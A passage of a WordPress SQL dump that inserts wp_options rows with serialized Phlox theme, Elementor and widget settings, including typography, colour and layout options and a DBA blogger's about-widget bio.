255);}\";}s:16:\"custom_js_string\";s:0:\"\";s:15:\"custom_js_array\";a:0:{}s:25:\"default_template_imported\";b:1;s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1681758570;s:4:\"data\";a:13:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:25:\"aux_latest_posts_slider-2\";i:1;s:8:\"search-2\";i:2;s:17:\"recent-comments-2\";i:3;s:6:\"text-2\";i:4;s:6:\"text-3\";}s:40:\"auxin-global-primary-sidebar-widget-area\";a:1:{i:0;s:18:\"aux_about_widget-2\";}s:42:\"auxin-global-secondary-sidebar-widget-area\";a:1:{i:0;s:6:\"meta-3\";}s:30:\"auxin-shop-sidebar-widget-area\";a:1:{i:0;s:26:\"bigbluebuttonsidebarwidget\";}s:39:\"auxin-pages-primary-sidebar-widget-area\";a:0:{}s:41:\"auxin-pages-secondary-sidebar-widget-area\";a:0:{}s:38:\"auxin-blog-primary-sidebar-widget-area\";a:0:{}s:40:\"auxin-blog-secondary-sidebar-widget-area\";a:0:{}s:32:\"auxin-search-sidebar-widget-area\";a:0:{}s:31:\"auxin-subfooter-bar-widget-area\";a:0:{}s:33:\"auxin-footer1-sidebar-widget-area\";a:0:{}s:33:\"auxin-footer2-sidebar-widget-area\";a:0:{}s:33:\"auxin-footer3-sidebar-widget-area\";a:0:{}}}s:11:\"custom_logo\";i:396;s:35:\"rate_scale_notice_remind_later_date\";i:0;s:35:\"increasing_curl_timeout_is_required\";i:15;}','no'),
(101029,'_transient_auxin_maybe_flush_autoptimize_cache','172800','yes'),
(101030,'elementor_disable_color_schemes','yes','yes'),
(101031,'elementor_disable_typography_schemes','yes','yes'),
(101032,'elementor_page_title_selector','.page-title','yes'),
(101033,'elementor_allow_svg','1','yes'),
(101036,'rp4wp_do_install','0','no'),
(101037,'widget_aux_about_widget','a:2:{i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"name\";s:15:\"Masoud Nikoofar\";s:6:\"skills\";s:18:\"DBA, Data Engineer\";s:4:\"info\";s:141:\"Hi. Welcome to my blog.\nI\'m a DBA and I am going to share my experiences here with others.\nFeel free to contact me and tell me your opinions.\";s:11:\"about_image\";s:3:\"405\";s:11:\"image_style\";s:6:\"circle\";s:12:\"align_center\";s:2:\"on\";s:12:\"show_socials\";s:2:\"on\";s:13:\"extra_classes\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),
(101038,'widget_aux_recent_post_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101039,'widget_aux_popular_posts_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101040,'widget_aux_testimonial','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101041,'widget_aux_staff','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101042,'widget_aux_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101043,'widget_aux_code','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101044,'widget_aux_contact_form','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101045,'widget_aux_divider','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101046,'widget_aux_gmaps','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101047,'widget_aux_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101048,'widget_aux_before_after','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101049,'widget_aux_accordion_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101050,'widget_aux_tabs_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101051,'widget_aux_recent_product','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101052,'widget_aux_latest_posts_slider','a:2:{i:2;a:27:{s:5:\"title\";s:0:\"\";s:9:\"post_type\";s:4:\"post\";s:10:\"slides_num\";s:2:\"10\";s:7:\"exclude\";s:0:\"\";s:7:\"include\";s:0:\"\";s:6:\"offset\";s:0:\"\";s:8:\"order_by\";s:4:\"date\";s:9:\"order_dir\";s:4:\"DESC\";s:4:\"skin\";s:14:\"aux-light-skin\";s:9:\"add_title\";s:2:\"on\";s:8:\"add_meta\";s:2:\"on\";s:10:\"image_from\";s:4:\"auto\";s:12:\"custom_image\";s:0:\"\";s:21:\"exclude_without_image\";s:2:\"on\";s:5:\"width\";s:3:\"960\";s:6:\"height\";s:3:\"560\";s:6:\"arrows\";s:1:\"0\";s:5:\"space\";s:1:\"5\";s:4:\"loop\";s:2:\"on\";s:9:\"slideshow\";s:1:\"0\";s:15:\"slideshow_delay\";s:1:\"2\";s:13:\"extra_classes\";s:0:\"\";s:17:\"inview_transition\";s:4:\"none\";s:15:\"inview_duration\";s:3:\"600\";s:12:\"inview_delay\";s:0:\"\";s:13:\"inview_repeat\";s:2:\"no\";s:13:\"inview_offset\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),
(101053,'widget_aux_quote','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101054,'widget_aux_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101055,'widget_aux_socials_list','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101056,'widget_aux_socials_list_2','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101057,'widget_aux_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101058,'widget_aux_contact_box','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101063,'woocommerce_maybe_regenerate_images_hash','991b1ca641921cf0f5baf7a2fe85861b','yes'),
(101080,'medium_crop','1','yes'),
(101081,'medium_large_crop','1','yes'),
(101082,'large_crop','1','yes'),
(101093,'phlox_audit_token','f81a5091fd7d2801b13ab5b8c6b3fb53','yes'),
(101102,'phlox_theme_options','a:487:{s:24:\"typography_html_template\";s:0:\"\";s:27:\"global_colors_html_template\";s:0:\"\";s:17:\"site_wrapper_size\";s:4:\"full\";s:21:\"site_max_width_layout\";s:5:\"s-fhd\";s:15:\"body_typography\";s:393:\"{\"typography-hover\":{\"normal\":{\"color\":\"rgb(255, 255, 255)\"},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 249, 249, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:19:\"general_heading_all\";s:0:\"\";s:18:\"general_heading_h1\";s:354:\"{\"typography-hover\":{\"normal\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:18:\"general_heading_h2\";s:685:\"{\"typography-hover\":{\"normal\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:18:\"general_heading_h3\";s:685:\"{\"typography-hover\":{\"normal\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:18:\"general_heading_h4\";s:0:\"\";s:18:\"general_heading_h5\";s:0:\"\";s:17:\"header_logo_width\";s:2:\"80\";s:27:\"header_logo_max_height_type\";s:4:\"auto\";s:22:\"header_logo_max_height\";s:2:\"85\";s:25:\"page_animation_nav_enable\";s:0:\"\";s:23:\"page_animation_nav_type\";s:4:\"fade\";s:19:\"page_preload_enable\";s:0:\"\";s:27:\"page_preload_custom_loading\";s:0:\"\";s:26:\"page_preload_loading_image\";s:0:\"\";s:25:\"page_preload_prgoress_bar\";s:1:\"1\";s:34:\"page_preload_prgoress_bar_position\";s:3:\"top\";s:31:\"page_preload_prgoress_bar_color\";s:7:\"#FFFFFF\";s:31:\"page_preload_page_overlay_color\";s:0:\"\";s:23:\"elementor_color_primary\";s:7:\"#6EC1E4\";s:25:\"elementor_color_secondary\";s:7:\"#54595F\";s:20:\"elementor_color_text\";s:7:\"#7A7A7A\";s:22:\"elementor_color_accent\";s:7:\"#61CE70\";s:39:\"elementor_global_custom_colors_repeater\";s:0:\"\";s:31:\"use_legacy_featured_colors_info\";s:0:\"\";s:26:\"use_legacy_featured_colors\";s:0:\"\";s:21:\"site_featured_color_1\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_2\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_3\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_4\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_5\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_6\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_7\";s:18:\"rgb(255, 255, 255)\";s:21:\"site_featured_color_8\";s:18:\"rgb(255, 255, 255)\";s:25:\"site_body_background_show\";b:1;s:26:\"site_body_background_color\";s:22:\"rgba(47, 79, 79, 0.97)\";s:28:\"site_body_background_pattern\";s:4:\"none\";s:26:\"site_body_background_image\";s:0:\"\";s:25:\"site_body_background_size\";s:5:\"cover\";s:27:\"site_body_background_repeat\";s:9:\"no-repeat\";s:29:\"site_body_background_position\";s:8:\"left top\";s:27:\"site_body_background_attach\";s:6:\"scroll\";s:29:\"site_content_background_color\";s:19:\"rgba(0, 0, 0, 0.97)\";s:15:\"site_frame_show\";b:0;s:27:\"site_frame_background_color\";s:7:\"#111111\";s:24:\"global_video_player_skin\";s:4:\"dark\";s:24:\"global_audio_player_skin\";s:4:\"dark\";s:23:\"archive_pagination_skin\";s:10:\"aux-square\";s:34:\"archive_pagination_skin_typography\";s:0:\"\";s:41:\"archive_pagination_skin_active_typography\";s:0:\"\";s:44:\"archive_pagination_skin_next_prev_typography\";s:0:\"\";s:33:\"site_mobile_browser_toolbar_color\";s:7:\"#1bb0ce\";s:20:\"comment_forms_inputs\";a:4:{i:0;s:5:\"email\";i:1;s:6:\"author\";i:2;s:3:\"url\";i:3;s:7:\"cookies\";}s:18:\"comment_forms_skin\";s:7:\"classic\";s:19:\"comment_forms_label\";s:0:\"\";s:24:\"comment_forms_label_typo\";s:0:\"\";s:20:\"comment_forms_layout\";s:7:\"default\";s:26:\"comment_forms_replay_title\";s:13:\"Add a Comment\";s:31:\"comment_forms_replay_title_typo\";s:0:\"\";s:19:\"comment_forms_notes\";s:70:\"Your email address will not be published. Required fields are marked *\";s:24:\"comment_forms_notes_typo\";s:0:\"\";s:33:\"comment_forms_response_title_typo\";s:0:\"\";s:25:\"comment_forms_button_typo\";s:0:\"\";s:30:\"comment_forms_placeholder_typo\";s:0:\"\";s:19:\"comment_author_typo\";s:0:\"\";s:17:\"comment_info_typo\";s:0:\"\";s:20:\"comment_content_typo\";s:0:\"\";s:38:\"sidebar_common_widget_title_typography\";s:0:\"\";s:39:\"sidebar_primary_widget_title_typography\";s:0:\"\";s:41:\"sidebar_secondary_widget_title_typography\";s:0:\"\";s:25:\"sidebar_global_typography\";s:0:\"\";s:24:\"sidebar_widget_togglable\";s:0:\"\";s:29:\"sidebar_widget_expand_on_init\";s:1:\"1\";s:23:\"sidebar_custom_dropdown\";s:4:\"none\";s:35:\"site_elementor_header_edit_template\";s:3:\"388\";s:30:\"site_elementor_header_template\";s:3:\"388\";s:39:\"site_elementor_header_templates_library\";s:0:\"\";s:22:\"site_header_use_legacy\";s:0:\"\";s:19:\"site_overlay_header\";b:0;s:22:\"site_header_top_sticky\";b:1;s:19:\"sticky_header_color\";s:12:\"rgb(0, 0, 0)\";s:35:\"site_header_container_scaled_height\";s:1:\"0\";s:17:\"site_header_info3\";s:0:\"\";s:30:\"site_header_section_use_legacy\";s:0:\"\";s:22:\"site_header_top_layout\";s:21:\"horizontal-menu-right\";s:17:\"site_header_width\";s:5:\"boxed\";s:28:\"site_header_container_height\";s:2:\"85\";s:25:\"site_header_search_button\";s:0:\"\";s:24:\"site_header_social_icons\";s:0:\"\";s:20:\"site_header_msg_text\";s:0:\"\";s:29:\"site_header_social_icons_size\";s:5:\"small\";s:16:\"show_header_logo\";s:1:\"1\";s:25:\"site_header_border_bottom\";s:1:\"1\";s:21:\"site_header_animation\";s:0:\"\";s:27:\"site_header_animation_delay\";s:0:\"\";s:31:\"site_transparent_header_bgcolor\";s:7:\"#FFFFFF\";s:24:\"site_header_color_scheme\";s:4:\"dark\";s:31:\"site_header_sticky_color_scheme\";s:4:\"dark\";s:26:\"site_header_logo_can_scale\";s:1:\"1\";s:35:\"site_vertical_menu_background_color\";s:4:\"#FFF\";s:33:\"site_header_navigation_use_legacy\";s:0:\"\";s:31:\"site_header_navigation_sub_skin\";s:7:\"classic\";s:32:\"site_vertical_header_items_align\";s:4:\"left\";s:40:\"site_vertical_header_navigation_sub_skin\";s:7:\"classic\";s:33:\"site_header_navigation_sub_effect\";s:0:\"\";s:37:\"site_header_navigation_with_indicator\";s:1:\"1\";s:36:\"site_header_navigation_with_splitter\";s:1:\"1\";s:33:\"site_vertical_menu_footer_display\";s:1:\"1\";s:34:\"site_vertical_header_search_border\";s:1:\"1\";s:28:\"site_vertical_menu_copyright\";s:1:\"1\";s:35:\"site_header_navigation_sub_location\";s:12:\"below-header\";s:34:\"site_header_navigation_item_height\";s:2:\"60\";s:37:\"site_mobile_header_section_use_legacy\";s:0:\"\";s:38:\"site_mobile_header_toggle_button_color\";s:7:\"#3d3d3d\";s:38:\"site_mobile_header_toggle_button_style\";s:14:\"aux-lite-small\";s:32:\"site_header_mobile_menu_position\";s:10:\"toggle-bar\";s:38:\"site_menu_full_screen_background_color\";s:25:\"rgba(255, 255, 255, 0.95)\";s:26:\"site_menu_full_screen_skin\";s:0:\"\";s:31:\"site_header_fullscreen_template\";s:6:\"center\";s:38:\"site_menu_full_screen_background_image\";s:0:\"\";s:32:\"site_header_fullscreen_indicator\";s:1:\"1\";s:43:\"site_header_mobile_menu_offcanvas_alignment\";s:4:\"left\";s:28:\"site_header_mobile_menu_type\";s:6:\"toggle\";s:33:\"site_topheader_section_use_legacy\";s:0:\"\";s:14:\"show_topheader\";s:0:\"\";s:22:\"site_top_header_layout\";s:10:\"topheader1\";s:30:\"top_header_navigation_sub_skin\";s:7:\"classic\";s:32:\"site_top_header_background_color\";s:7:\"#FFFFFF\";s:35:\"site_top_header_background_gradient\";s:0:\"\";s:17:\"topheader_message\";s:0:\"\";s:27:\"topheader_secondary_message\";s:0:\"\";s:35:\"site_full_screen_section_use_legacy\";s:0:\"\";s:41:\"site_header_typography_section_use_legacy\";s:0:\"\";s:27:\"header_main_menu_typography\";s:0:\"\";s:25:\"header_submenu_typography\";s:0:\"\";s:34:\"header_menu_active_item_typography\";s:0:\"\";s:21:\"site_title_typography\";s:0:\"\";s:27:\"site_description_typography\";s:0:\"\";s:48:\"site_header_topbar_typography_section_use_legacy\";s:0:\"\";s:30:\"topheader_main_menu_typography\";s:0:\"\";s:28:\"topheader_message_typography\";s:0:\"\";s:38:\"topheader_secondary_message_typography\";s:0:\"\";s:22:\"socials_hide_on_tablet\";s:1:\"1\";s:21:\"socials_hide_on_phone\";s:1:\"1\";s:19:\"socials_brand_color\";s:0:\"\";s:25:\"socials_brand_color_hover\";s:0:\"\";s:26:\"socials_brand_color_custom\";s:0:\"\";s:8:\"facebook\";s:0:\"\";s:7:\"twitter\";s:0:\"\";s:8:\"dribbble\";s:0:\"\";s:7:\"youtube\";s:0:\"\";s:5:\"vimeo\";s:0:\"\";s:6:\"flickr\";s:0:\"\";s:4:\"digg\";s:0:\"\";s:11:\"stumbleupon\";s:0:\"\";s:6:\"lastfm\";s:0:\"\";s:9:\"delicious\";s:0:\"\";s:5:\"skype\";s:0:\"\";s:8:\"linkedin\";s:0:\"\";s:6:\"tumblr\";s:0:\"\";s:9:\"pinterest\";s:0:\"\";s:9:\"instagram\";s:0:\"\";s:2:\"vk\";s:0:\"\";s:8:\"telegram\";s:0:\"\";s:3:\"rss\";s:0:\"\";s:28:\"post_single_sidebar_position\";s:13:\"right-sidebar\";s:30:\"post_single_sidebar_decoration\";s:7:\"overlap\";s:26:\"post_single_featured_color\";s:7:\"#1bb0ce\";s:21:\"post_max_width_layout\";s:0:\"\";s:25:\"post_single_content_style\";s:6:\"simple\";s:28:\"post_show_content_top_margin\";b:1;s:22:\"show_post_single_media\";s:1:\"1\";s:26:\"show_post_single_meta_info\";b:1;s:19:\"post_meta_date_show\";b:0;s:21:\"post_meta_author_show\";b:0;s:23:\"post_meta_comments_show\";b:0;s:25:\"post_meta_categories_show\";s:1:\"1\";s:29:\"show_post_single_tags_section\";s:1:\"1\";s:27:\"show_blog_post_share_button\";s:1:\"1\";s:27:\"blog_post_share_button_type\";s:4:\"icon\";s:27:\"blog_post_share_button_icon\";s:13:\"auxicon-share\";s:33:\"blog_post_share_button_icon_color\";s:0:\"\";s:39:\"blog_post_share_button_icon_hover_color\";s:0:\"\";s:32:\"blog_post_share_button_icon_size\";s:0:\"\";s:29:\"blog_post_share_button_margin\";s:0:\"\";s:24:\"show_blog_author_section\";b:0;s:29:\"show_blog_author_section_text\";s:1:\"1\";s:31:\"show_blog_author_section_social\";s:1:\"1\";s:30:\"show_post_single_next_prev_nav\";s:1:\"1\";s:30:\"post_single_next_prev_nav_skin\";s:7:\"minimal\";s:30:\"comment_cookie_consent_enabled\";s:1:\"1\";s:19:\"comment_avatar_size\";s:2:\"60\";s:19:\"post_title_bar_show\";b:0;s:21:\"post_title_bar_preset\";s:17:\"normal_bg_light_1\";s:31:\"post_title_bar_enable_customize\";b:0;s:33:\"post_title_bar_content_width_type\";s:5:\"boxed\";s:37:\"post_title_bar_content_section_height\";s:4:\"auto\";s:29:\"post_title_bar_vertical_align\";s:3:\"top\";s:27:\"post_title_bar_scroll_arrow\";s:4:\"none\";s:25:\"post_title_bar_title_show\";s:1:\"1\";s:31:\"post_title_bar_heading_bordered\";b:0;s:28:\"post_title_bar_heading_boxed\";b:0;s:31:\"post_title_bar_heading_bg_color\";s:0:\"\";s:27:\"post_title_bar_meta_enabled\";b:0;s:28:\"post_title_bar_bread_enabled\";b:1;s:29:\"post_title_bar_bread_bordered\";b:0;s:30:\"post_title_bar_bread_sep_style\";s:0:\"\";s:25:\"post_title_bar_text_align\";s:6:\"center\";s:28:\"post_title_bar_overlay_color\";s:0:\"\";s:30:\"post_title_bar_overlay_pattern\";s:4:\"none\";s:38:\"post_title_bar_overlay_pattern_opacity\";s:4:\"0.15\";s:26:\"post_title_bar_color_style\";s:4:\"dark\";s:22:\"post_title_bar_bg_show\";b:1;s:26:\"post_title_bar_bg_parallax\";b:1;s:23:\"post_title_bar_bg_color\";s:16:\"rgb(115, 79, 79)\";s:22:\"post_title_bar_bg_size\";s:4:\"auto\";s:23:\"post_title_bar_bg_image\";s:0:\"\";s:27:\"post_title_bar_bg_video_mp4\";s:0:\"\";s:27:\"post_title_bar_bg_video_ogg\";s:0:\"\";s:28:\"post_title_bar_bg_video_webm\";s:0:\"\";s:35:\"post_single_title_show_over_content\";b:1;s:27:\"post_single_title_alignment\";s:7:\"default\";s:24:\"post_index_template_type\";s:7:\"default\";s:32:\"blog_archive_show_featured_image\";b:1;s:29:\"post_archive_max_width_layout\";s:0:\"\";s:23:\"post_image_aspect_ratio\";s:4:\"0.56\";s:32:\"blog_archive_mask_featured_image\";s:1:\"1\";s:32:\"post_index_column_content_layout\";s:4:\"full\";s:17:\"display_post_info\";b:0;s:18:\"post_info_position\";s:11:\"after-title\";s:22:\"display_post_info_date\";b:0;s:24:\"display_post_info_author\";b:0;s:28:\"display_post_info_categories\";b:0;s:26:\"display_post_info_comments\";b:0;s:28:\"display_post_comments_number\";s:1:\"1\";s:28:\"blog_display_author_readmore\";s:8:\"readmore\";s:26:\"blog_display_author_header\";s:1:\"1\";s:26:\"blog_display_author_footer\";s:0:\"\";s:24:\"post_index_column_number\";s:1:\"4\";s:31:\"post_index_column_number_tablet\";s:7:\"inherit\";s:31:\"post_index_column_number_mobile\";s:1:\"1\";s:21:\"exclude_without_media\";s:1:\"1\";s:31:\"post_exclude_quote_link_formats\";s:1:\"1\";s:24:\"post_index_loadmore_type\";s:0:\"\";s:25:\"post_index_read_more_text\";s:9:\"Read More\";s:29:\"post_index_timeline_alignment\";s:6:\"center\";s:27:\"post_index_sidebar_position\";s:13:\"right-sidebar\";s:29:\"post_index_sidebar_decoration\";s:7:\"overlap\";s:23:\"blog_content_on_listing\";s:4:\"none\";s:30:\"blog_content_on_listing_length\";s:3:\"255\";s:24:\"post_archive_slider_show\";s:1:\"1\";s:24:\"post_archive_slider_type\";s:7:\"default\";s:28:\"post_archive_slider_location\";s:5:\"block\";s:30:\"post_archive_slider_slides_num\";s:2:\"10\";s:27:\"post_archive_slider_exclude\";s:0:\"\";s:27:\"post_archive_slider_include\";s:0:\"\";s:26:\"post_archive_slider_offset\";s:0:\"\";s:28:\"post_archive_slider_order_by\";s:4:\"date\";s:29:\"post_archive_slider_order_dir\";s:4:\"DESC\";s:24:\"post_archive_slider_skin\";s:14:\"aux-light-skin\";s:29:\"post_archive_slider_add_title\";s:1:\"1\";s:28:\"post_archive_slider_add_meta\";s:1:\"1\";s:30:\"post_archive_slider_image_from\";s:4:\"auto\";s:32:\"post_archive_slider_custom_image\";s:0:\"\";s:42:\"post_archive_slider_exclude_without_images\";s:1:\"1\";s:25:\"post_archive_slider_width\";s:3:\"960\";s:26:\"post_archive_slider_height\";s:3:\"560\";s:26:\"post_archive_slider_arrows\";s:0:\"\";s:25:\"post_archive_slider_space\";s:1:\"5\";s:24:\"post_archive_slider_loop\";s:1:\"1\";s:29:\"post_archive_slider_slideshow\";s:0:\"\";s:35:\"post_archive_slider_slideshow_delay\";s:1:\"2\";s:35:\"post_taxonomy_archive_template_type\";s:1:\"2\";s:38:\"post_taxonomy_archive_sidebar_position\";s:12:\"left-sidebar\";s:40:\"post_taxonomy_archive_sidebar_decoration\";s:7:\"overlap\";s:40:\"post_taxonomy_archive_content_on_listing\";s:4:\"none\";s:39:\"post_taxonomy_archive_on_listing_length\";s:3:\"255\";s:26:\"display_post_taxonomy_info\";b:0;s:31:\"display_post_taxonomy_info_date\";s:1:\"1\";s:33:\"display_post_taxonomy_info_author\";s:1:\"1\";s:37:\"display_post_taxonomy_info_categories\";s:1:\"1\";s:35:\"display_post_taxonomy_info_comments\";s:1:\"1\";s:37:\"display_post_taxonomy_widget_comments\";s:1:\"1\";s:37:\"display_post_taxonomy_author_readmore\";s:8:\"readmore\";s:35:\"display_post_taxonomy_author_header\";s:1:\"1\";s:35:\"display_post_taxonomy_author_footer\";s:0:\"\";s:27:\"post_taxonomy_loadmore_type\";s:0:\"\";s:28:\"single_post_title_typography\";s:0:\"\";s:30:\"single_post_content_typography\";s:0:\"\";s:27:\"single_post_info_typography\";s:0:\"\";s:33:\"single_post_info_terms_typography\";s:0:\"\";s:27:\"single_post_meta_typography\";s:0:\"\";s:33:\"single_post_meta_terms_typography\";s:0:\"\";s:31:\"single_post_subtitle_typography\";s:0:\"\";s:33:\"single_post_breadcrumb_typography\";s:0:\"\";s:26:\"blog_page_title_typography\";s:400:\"{\"typography-hover\":{\"normal\":{\"color\":\"rgba(255, 255, 255, 0.98)\"},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:25:\"blog_page_info_typography\";s:685:\"{\"typography-hover\":{\"normal\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:31:\"blog_page_info_terms_typography\";s:685:\"{\"typography-hover\":{\"normal\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:28:\"blog_page_content_typography\";s:685:\"{\"typography-hover\":{\"normal\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}},\"hover\":{\"font-family\":{\"value\":\"none\",\"type\":\" \"},\"color\":\"rgba(255, 255, 255, 0.98)\",\"font-size-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"font-weight\":\"\",\"text-transform\":\"\",\"font-style\":\"\",\"text-decoration\":\"\",\"line-height-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}},\"letter-spacing-resp\":{\"desktop\":{\"value\":\"\",\"unit\":\"px\"}}}}}\";s:27:\"blog_page_button_typography\";s:0:\"\";s:28:\"page_single_sidebar_position\";s:13:\"right-sidebar\";s:30:\"page_single_sidebar_decoration\";s:7:\"overlap\";s:28:\"page_show_content_top_margin\";s:1:\"1\";s:21:\"page_max_width_layout\";s:0:\"\";s:19:\"page_content_layout\";s:4:\"full\";s:19:\"page_title_bar_show\";b:0;s:21:\"page_title_bar_preset\";s:14:\"full_bg_dark_4\";s:31:\"page_title_bar_enable_customize\";s:0:\"\";s:33:\"page_title_bar_content_width_type\";s:5:\"boxed\";s:37:\"page_title_bar_content_section_height\";s:4:\"auto\";s:29:\"page_title_bar_vertical_align\";s:14:\"bottom-overlap\";s:27:\"page_title_bar_scroll_arrow\";s:4:\"none\";s:25:\"page_title_bar_title_show\";s:1:\"1\";s:31:\"page_title_bar_heading_bordered\";b:0;s:28:\"page_title_bar_heading_boxed\";b:1;s:31:\"page_title_bar_heading_bg_color\";s:0:\"\";s:27:\"p